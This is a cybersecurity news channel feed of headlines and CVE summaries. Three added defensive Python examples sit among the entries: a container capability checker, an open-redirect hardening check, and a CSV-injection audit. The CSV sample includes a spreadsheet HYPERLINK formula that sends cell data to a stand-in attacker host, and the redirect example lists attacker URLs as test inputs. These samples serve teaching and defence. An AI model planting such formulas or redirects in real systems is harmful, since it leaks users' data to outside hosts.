🛡 Cybersecurity & Privacy 🛡 - News
25.8K subscribers
89.2K links
🗞 The finest daily news on cybersecurity and privacy.

🔔 Daily releases.

💻 Is your online life secure?

📩 lalilolalo.dev@gmail.com
🕴 How Casinos Can Prevent Loyalty Incentive and Account Takeover Fraud 🕴

As casinos go digital, their loyalty programs and authentic accounts are at risk.

📖 Read via "Dark Reading".
❌ Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug ❌

A patch fixes an exploit hidden in Elden Ring that traps PC players in a ‘death loop.’

📖 Read via "Threat Post".
πŸ” Proposed Commission Would Seek to Modernize HIPAA πŸ”

As part of new legislation, a new commission would assess the current state of health data privacy and lay the groundwork for modernizing HIPAA.

πŸ“– Read

via "".
‼ CVE-2021-43085 ‼

An Insecure Permissions vulnerability exists in OpenSSL 3.0 due to an error in the implementation of the CMAC_Final() function.

📖 Read via "National Vulnerability Database".
‼ CVE-2021-43666 ‼

A Denial of Service vulnerability exists in mbed TLS 3.0.0 and earlier in the mbedtls_pkcs12_derivation function when an input password's length is 0.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-22374 ‼

The BMC (IBM Power 9 AC922 OP910, OP920, OP930, and OP940) may be subject to a downgrade attack, which may affect its ability to operate its host. IBM X-Force ID: 221442.

📖 Read via "National Vulnerability Database".
‼ CVE-2021-43084 ‼

An SQL Injection vulnerability exists in Dreamer CMS 4.0.0 via the tableName parameter.

📖 Read via "National Vulnerability Database".
❌ Microsoft Azure Developers Awash in PII-Stealing npm Packages ❌

A large-scale, automated typosquatting attack saw 200+ malicious packages flood the npm code repository, targeting popular Azure scopes.

📖 Read via "Threat Post".
❌ UK Cops Collar 7 Suspected Lapsus$ Gang Members ❌

London Police can't say if they nabbed the 17-year-old suspected mastermind & multimillionaire – but researchers say they’ve been tracking an Oxford teen since mid-2021.

📖 Read via "Threat Post".
πŸ‘1
‼ CVE-2022-24781 ‼

Geon is a board game based on solving questions about the Pythagorean Theorem. Malicious users can obtain the uuid from other users, spoof that uuid through the browser console and become co-owners of the target session. This issue is patched in version 1.1.0. No known workaround exists.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-24782 ‼

Discourse is an open source discussion platform. Versions 2.8.2 and prior in the `stable` branch, 2.9.0.beta3 and prior in the `beta` branch, and 2.9.0.beta3 and prior in the `tests-passed` branch are vulnerable to a data leak. Users can request an export of their own activity. Sometimes, due to category settings, they may have category membership for a secure category. The name of this secure category is shown to the user in the export. The same thing occurs when the user's post has been moved to a secure category. A patch for this issue is available in the `main` branch of Discourse's GitHub repository and is anticipated to be part of future releases.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-24769 ‼

Moby is an open-source project created by Docker to enable and accelerate software containerization. A bug was found in Moby (Docker Engine) prior to version 20.10.14 where containers were incorrectly started with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during `execve(2)`. Normally, when executable programs have specified permitted file capabilities, otherwise unprivileged users and processes can execute those programs and gain the specified file capabilities up to the bounding set. Due to this bug, containers which included executable programs with inheritable file capabilities allowed otherwise unprivileged users and processes to additionally gain these inheritable file capabilities up to the container's bounding set. Containers which use Linux users and groups to perform privilege separation inside the container are most directly impacted.

This bug did not affect the container security sandbox, as the inheritable set never contained more capabilities than were included in the container's bounding set.

This bug has been fixed in Moby (Docker Engine) 20.10.14. Running containers should be stopped, deleted, and recreated for the inheritable capabilities to be reset. This fix changes Moby (Docker Engine) behavior such that containers are started with a more typical Linux environment. As a workaround, the entry point of a container can be modified to use a utility like `capsh(1)` to drop inheritable capabilities prior to the primary process starting.

📖 Read via "National Vulnerability Database".
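The quickest way to tell whether a running container is in the state this advisory describes is to look at the `CapInh` line of `/proc/<pid>/status` for an unprivileged process inside it. The script below is an added example, not Moby or Docker code: it parses the `Cap*` lines (a constructed sample of an affected and a fixed container is embedded), decodes the hex bitmask into capability names using the bit numbers from `linux/capability.h`, and reports what sits in the inheritable set. The sample uses Docker's default capability mask; the process name and uid are made up.

```python
"""Detect the CVE-2022-24769 condition: a container process whose inheritable
capability set is non-empty even though it runs as an unprivileged user.

Added example, not Moby/Docker code. Parses the Cap* lines of
/proc/<pid>/status and decodes the bitmask into capability names."""

import re
from typing import Dict, List

# Capability names indexed by bit number (linux/capability.h: CAP_CHOWN = 0 ...).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Constructed sample: the Cap* block of a non-root process inside a container
# started by an affected engine. Permitted/effective are empty, as expected for
# uid 1000, but the inheritable set still carries Docker's default mask.
BUGGY_STATUS = """Name:\tsh
Uid:\t1000\t1000\t1000\t1000
CapInh:\t00000000a80425fb
CapPrm:\t0000000000000000
CapEff:\t0000000000000000
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""

# Constructed sample of the same process after the engine fix (and a recreate).
FIXED_STATUS = BUGGY_STATUS.replace(
    "CapInh:\t00000000a80425fb", "CapInh:\t0000000000000000")

_CAP_LINE = re.compile(r"^Cap(Inh|Prm|Eff|Bnd|Amb):\s*([0-9a-fA-F]+)\s*$", re.M)


def parse_cap_sets(status_text: str) -> Dict[str, int]:
    """Return {"Inh": mask, "Prm": mask, ...} parsed from status text."""
    return {name: int(mask, 16) for name, mask in _CAP_LINE.findall(status_text)}


def decode_caps(mask: int) -> List[str]:
    """Expand a capability bitmask into names, lowest bit first."""
    names = []
    bit = 0
    while mask:
        if mask & 1:
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else "cap_%d" % bit)
        mask >>= 1
        bit += 1
    return names


def inheritable_caps(status_text: str) -> List[str]:
    """Names in the inheritable set. For an unprivileged process in a container
    this should be empty; any bit listed here can be raised into the permitted
    set at execve(2) by a binary whose file capabilities carry the same bit."""
    return decode_caps(parse_cap_sets(status_text).get("Inh", 0))


def exceeds_bounding(status_text: str) -> bool:
    """True if the inheritable set has a bit outside the bounding set. The
    advisory states this never happened (so the sandbox itself held); the check
    lets a reader confirm that on a live process."""
    sets = parse_cap_sets(status_text)
    return bool(sets.get("Inh", 0) & ~sets.get("Bnd", 0))


def check_self() -> List[str]:
    """Run the inheritable-set check on the calling process (Linux only)."""
    with open("/proc/self/status") as f:
        return inheritable_caps(f.read())


if __name__ == "__main__":
    print("affected engine:", inheritable_caps(BUGGY_STATUS))
    print("fixed engine:   ", inheritable_caps(FIXED_STATUS))
```

Copy the script into a container and run it as the container's unprivileged user: a non-empty list means the engine is affected or the container predates the upgrade and still needs to be recreated. For the interim workaround the advisory mentions, `capsh --print` shows the current sets and `capsh --inh=` (an empty inheritable list) followed by `-- -c '<command>'` is one way to clear the set before handing off to the real entry point; the exact invocation depends on the capsh version in the image.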
‼ CVE-2022-24776 ‼

Flask-AppBuilder is an application development framework, built on top of the Flask web framework. Flask-AppBuilder contains an open redirect vulnerability when using the database authentication login page on versions below 3.4.5. This issue is fixed in version 3.4.5. There are currently no known workarounds.

📖 Read via "National Vulnerability Database".
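Login pages are a classic spot for open redirects because they accept a "return to" parameter and bounce the user there after authentication. The block below is an added example, not Flask-AppBuilder code and not its fix: it shows the trusting pattern beside a hardened check that only accepts targets resolving to the application's own host and scheme, using nothing beyond `urllib.parse` so it runs without Flask. The host name `app.example.com` and the parameter name `next` are assumptions for the example.

```python
"""Open redirect on a login page: the vulnerable pattern and a hardened check.

Added example, not Flask-AppBuilder code. With the trusting version, a link like
  https://app.example.com/login?next=https://attacker.example/
sends a victim to the attacker's page immediately after a successful login."""

from urllib.parse import urljoin, urlparse

APP_SCHEME = "https"
APP_HOST = "app.example.com"  # assumed deployment host for the example


def vulnerable_redirect(next_param: str, fallback: str = "/") -> str:
    """The pattern behind an open redirect: use the parameter as-is."""
    return next_param or fallback


def is_safe_redirect(target: str, host: str = APP_HOST, scheme: str = APP_SCHEME) -> bool:
    """Accept only targets that resolve to this application over its own scheme."""
    if not target:
        return False
    # Browsers strip tabs/newlines and treat backslashes as slashes in http(s)
    # URLs; refuse anything whose meaning could change under that normalisation.
    if any(ch.isspace() or ord(ch) < 0x20 for ch in target) or "\\" in target:
        return False
    # Scheme-relative URLs ("//attacker.example/") point at another host.
    if target.startswith("//"):
        return False
    base = "%s://%s/" % (scheme, host)
    resolved = urlparse(urljoin(base, target))
    # Absolute URLs keep their own scheme/netloc through urljoin, so a foreign
    # host, a userinfo trick ("host@evil") or a javascript: URL all fail here.
    return resolved.scheme == scheme and resolved.netloc == host


def safe_redirect(next_param: str, fallback: str = "/") -> str:
    """Hardened replacement: fall back to the app root on anything suspicious."""
    return next_param if is_safe_redirect(next_param) else fallback


if __name__ == "__main__":
    for candidate in ("/users/list", "https://attacker.example/",
                      "//attacker.example/", "https://app.example.com@attacker.example/",
                      "javascript:alert(1)"):
        print("%-45s vulnerable -> %-35s safe -> %s" % (
            candidate, vulnerable_redirect(candidate), safe_redirect(candidate)))
```

The check is deliberately strict: a relative path with a literal space is refused rather than normalised, since a legitimate `next` value should already be percent-encoded. Comparing `netloc` (which includes any port and userinfo) against the expected host is what defeats the `host@attacker` form; comparing only `hostname` would still reject it, but `netloc` also catches an unexpected port.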
‼ CVE-2022-25571 ‼

Bluedon Information Security Technologies Co., Ltd Internet Access Detector v1.0 was discovered to contain an information leak which allows attackers to access the contents of the password file via unspecified vectors.

📖 Read via "National Vulnerability Database".
🕴 Russian Nationals Indicted for Epic Triton/Trisis and Dragonfly Cyberattacks on Energy Firms 🕴

Four Russian government employees were charged by the DoJ for attack campaigns targeting hundreds of energy sector companies and organizations in 135 countries, including the US.

📖 Read via "Dark Reading".
‼ CVE-2022-26279 ‼

EyouCMS v1.5.5 was discovered to have no access control in the component /data/sqldata.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-26249 ‼

Survey King v0.3.0 does not filter data properly when exporting Excel files, allowing attackers to execute arbitrary code or access sensitive information via a CSV injection attack.

📖 Read via "National Vulnerability Database".
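CSV injection works because a spreadsheet application types a cell that begins with `=`, `+`, `-`, `@` (or a leading tab or carriage return) as a formula, and quoting the field does not help since the quotes are gone by the time the cell is typed. The block below is an added example, not Survey King code: it writes the same constructed survey rows in the vulnerable way (cells verbatim) and in a hardened way (formula-looking strings prefixed with an apostrophe, genuine numbers left alone), plus a scanner that audits an exported file for cells a spreadsheet would evaluate. The respondent names, answers and the `attacker.example` host are all made up.

```python
"""CSV/formula injection in a data export: vulnerable vs. hardened writer, and
an audit scanner for files produced by some other tool.

Added example, not Survey King code. Sample rows are constructed."""

import csv
import io
from typing import List, Sequence, Tuple

# Constructed sample rows: a header, an honest respondent, one whose answer is a
# formula pointing at a reserved example host, and a genuine negative number.
SAMPLE_ROWS = [
    ["respondent", "answer"],
    ["alice", "Works fine, thanks"],
    ["mallory", '=HYPERLINK("https://attacker.example/?"&A1,"Click to confirm")'],
    ["bob", -5],
]

# Leading characters that make a spreadsheet treat the cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell. Plain signed numbers
    ("-5", "+3.25") start with a trigger but are just numbers, so they pass."""
    if not cell.startswith(FORMULA_TRIGGERS):
        return False
    try:
        float(cell)
        return False
    except ValueError:
        return True


def neutralize_cell(value):
    """Prefix formula-looking strings with an apostrophe so the spreadsheet
    stores them as text. Real numeric types cannot carry a formula and are
    returned unchanged (bool is excluded because it subclasses int)."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_csv(rows: Sequence[Sequence], harden: bool = True) -> str:
    """harden=False reproduces the vulnerable behaviour (cells written verbatim);
    harden=True neutralizes each cell first. Quoting is QUOTE_ALL in both cases
    to show that quoting alone is not a defence."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if harden else c for c in row])
    return buf.getvalue()


def scan_csv(text: str) -> List[Tuple[int, int]]:
    """Audit an exported file: (row, column) of every cell that would be
    evaluated. csv.reader strips the quoting, mirroring what the spreadsheet
    sees, so quoted formulas are still reported."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c))
    return hits


if __name__ == "__main__":
    unsafe = export_csv(SAMPLE_ROWS, harden=False)
    print("vulnerable export flags:", scan_csv(unsafe))
    print(unsafe)
    print("hardened export flags:", scan_csv(export_csv(SAMPLE_ROWS)))
```

The apostrophe prefix is the mitigation spreadsheets themselves understand; it does alter the stored text, so a consumer that round-trips the file programmatically should strip it again. The scanner's number exemption keeps audits of real exports readable, but a value such as `-1+cmd|...` still trips it because it is not a valid number.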
‼ CVE-2022-26301 ‼

TuziCMS v2.0.6 was discovered to contain a SQL injection vulnerability via the component App\Manage\Controller\ZhuantiController.class.php.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-26272 ‼

A remote code execution (RCE) vulnerability in Ionize v1.0.8.1 allows attackers to execute arbitrary code via a crafted string written to the file application/config/config.php.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-25575 ‼

Multiple cross-site scripting (XSS) vulnerabilities in Parking Management System v1.0 allow attackers to execute arbitrary web scripts or HTML via crafted payloads injected into the user name, password, and verification code text boxes.

📖 Read via "National Vulnerability Database".
‼ CVE-2022-25576 ‼

Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component anchor/routes/posts.php. This vulnerability allows attackers to arbitrarily delete posts.

📖 Read via "National Vulnerability Database".